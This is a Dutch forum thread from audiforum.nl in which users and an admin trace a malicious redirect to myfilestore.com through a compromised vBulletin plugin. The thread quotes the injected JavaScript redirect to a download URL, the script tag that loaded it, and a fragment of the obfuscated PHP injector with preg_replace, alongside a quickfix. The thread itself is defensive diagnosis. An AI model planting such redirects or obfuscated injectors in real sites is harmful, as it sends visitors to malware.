Melding van trojaans paard op audiforum

[PaulusV6]

Super dat het opgelost is tevens heb ik een mail gestuurd eerder naar de webmaster en via contact formulier van deze inzake mijn oude account PaulusB die ik vanaf 2006 had zou Iemand deze mail kunnen oppakken? Dan kan dit account Paulusv6 weer verwijderd alvast dank

[ChronoworX]

Ik krijg hem de laatste paar weken weer!
myfilestore.jpg

[Nenna]

Hier ook

[Arlo]

Even een @Sander erbij..

Ik gebruik Windows 10 + Chrome en heb geen meldingen

[Sander]

Ik krijg hem de laatste paar weken weer!
myfilestore.jpg

Op welke pagina krijg je dat?

Google geeft geen meldingen voor zover
https://www.google.com/transparencyr...w.audiforum.nl

[ChronoworX]

Vaak als ik vanaf de Twitter feed naar de site ga. Ga ik daarna nog een keer, dan gaat het we goed. Ik zal het even in de gaten houden en kijken of ik een patroon zie.

[Nenna]

Ik altijd op de homepage, 2e poging gaat altijd goed. Vandaag de redirect gehad op m'n mobiel en op m'n Windows 10 laptop.

[ChronoworX]

Even wat gepield, hier een voor mij consistente reproductie (zowel in Chrome als Vivaldi, met of zonder adblocker):
- Cache legen
- Browser herstarten
- Naar www.audiforum.nl gaan en inloggen
- Navigeer naar: http://www.audiforum.nl/forum/audifo...ndrijving.html (geen probleem)
- Navigeer naar: https://t.co/xICXpiAndo (twitter shortlink naar bit.ly shortlink, die naar de URL hierboven verwijst)

Heb even wat sniffing gedaan en zie het volgende.
Zodra je via de t.co shortlink naar de site gaat, wordt op de pagina van het betreffende topic de file http://www.audiforum.nl/forum/misc.php?v=423&js=js aangeroepen. Dit levert een mini JS file op met onderstaand commando, wat inderdaad de redirect veroorzaakt:

Code:

document.location='http://myfilestore.com/download.php?id=7ba7bd85'

Netwerk sniffing laat zien dat dit stukje van het AF IP af komt, dus lijkt toch echt een lek in VBulletin.

In de "normale" situatie wordt het betreffende misc.php file überhaupt niet aangeroepen. Even gekeken waar die misc.php wordt ingeladen, en zo te zien wordt dit geinject in de <HEAD>, vlak onder de include van de vbulletin-core.js:

Code:

<script type="text/javascript" src="http://www.audiforum.nl/forum/misc.php?v=423&js=js"></script>

Het lijkt mij dat het niet normaal is dat die misc.php aan wordt geroepen met de "&js=js" parameter, dus dat zal ook iets te maken met de exploit.

Weer wat verder ge-googled:
http://www.vbulletin.com/forum/forum...curity-exploit
Lijkt dus (iig) een lek in YUI te zijn geweest, maar dat is van lang geleden. Ik kan niks recents vinden, dus wellicht dat er nog een plugin / component van vBulletin outdated is.

Deze thread geeft iig een hint voor een quickfix:
https://theadminzone.com/threads/tro...-forum.107913/

Code:

if($_GET['js']=='js') die;

Als ik iets moet testen hoor ik het wel

[Sander]

thanks @ChronoworX!

Heb de hack gevonden;

$pt = \'b443e4a7f3c4e5fba3ab204301a6c617\';
$arrvb = hoop nare encrypted code;
$ajx = \'";<sJZ$nCa1X*re9,!.f|x)5:Iu^yPq4U}S#lvz8%Q>+W_b6 {M~/&-L2HkjKhd`GYgVptADFo=]?ciOwR([7@m0T3NEB\';
$ajx2 = \'4t#]qQGw[c"$^_hjFZN!{Sf/0P2;idzA:yV(g?1mK.C}Mao)7%rRu,k8b~HXD&n<|xJsL@+B*l 39-IY`vUe5EO>W6pT=\';
$baseline = \'%s%\'.substr($arrvb, 507, 1);
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), \'vbseo\');

oude plugin die een vulnerability had. Zou nu goed opgeschoond moeten zijn.

http://club.myce.com/f20/vbulletin-m...e-them-332219/

[Blue Whale]

Ik krijg ook een melding, alleen op deze pagina. Pas na disabelen van AVAST kan ik deze pagina openen.

avast.jpg

[ChronoworX]

thanks @ChronoworX!

Heb de hack gevonden;

$pt = \'b443e4a7f3c4e5fba3ab204301a6c617\';
$arrvb = hoop nare encrypted code;
$ajx = \'";<sJZ$nCa1X*re9,!.f|x)5:Iu^yPq4U}S#lvz8%Q>+W_b6 {M~/&-L2HkjKhd`GYgVptADFo=]?ciOwR([7@m0T3NEB\';
$ajx2 = \'4t#]qQGw[c"$^_hjFZN!{Sf/0P2;idzA:yV(g?1mK.C}Mao)7%rRu,k8b~HXD&n<|xJsL@+B*l 39-IY`vUe5EO>W6pT=\';
$baseline = \'%s%\'.substr($arrvb, 507, 1);
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), \'vbseo\');

oude plugin die een vulnerability had. Zou nu goed opgeschoond moeten zijn.

http://club.myce.com/f20/vbulletin-m...e-them-332219/

Kan hem niet meer reproduceren, goed bezig!

[ChronoworX]

Ik krijg ook een melding, alleen op deze pagina. Pas na disabelen van AVAST kan ik deze pagina openen.

avast.jpg

Haha, goeie scanner Komt denk ik omdat @Sander de kwaadaardige code heeft geplaatst.

[Brake]

Ik werd vanuit Google net ook doorverwezen naar myfilestore.com.

[ChronoworX]

@Sander helaas is 'ie er weer
Mijn reproductie van hierboven is weer zichtbaar.

[Sander]

@Sander helaas is 'ie er weer
Mijn reproductie van hierboven is weer zichtbaar.

Nieuwe poging, kijken of het nu wel goed gaat...

[A6 Black Optic]

Zo kreeg dit net ook ! zocht op google naar "muziek streamen audi mmi' en dan krijg je een paar hits van audiforum.nl Elektronica en Diagnose... en ik nam dan de kleinere hit eronder

http://www.google.nl/url?sa=t&rct=j&...774,bs.1,d.d24

Bam gelijk popups en weet ik veel wat een ellende !

[ChronoworX]

Helaas, alsnog / weer aanwezig.

[Sander]

en nu?

[ChronoworX]

Is nu weer in orde.

[Nenna]

Al 3 keer gehad vandaag @Sander. Allemaal vanuit Google.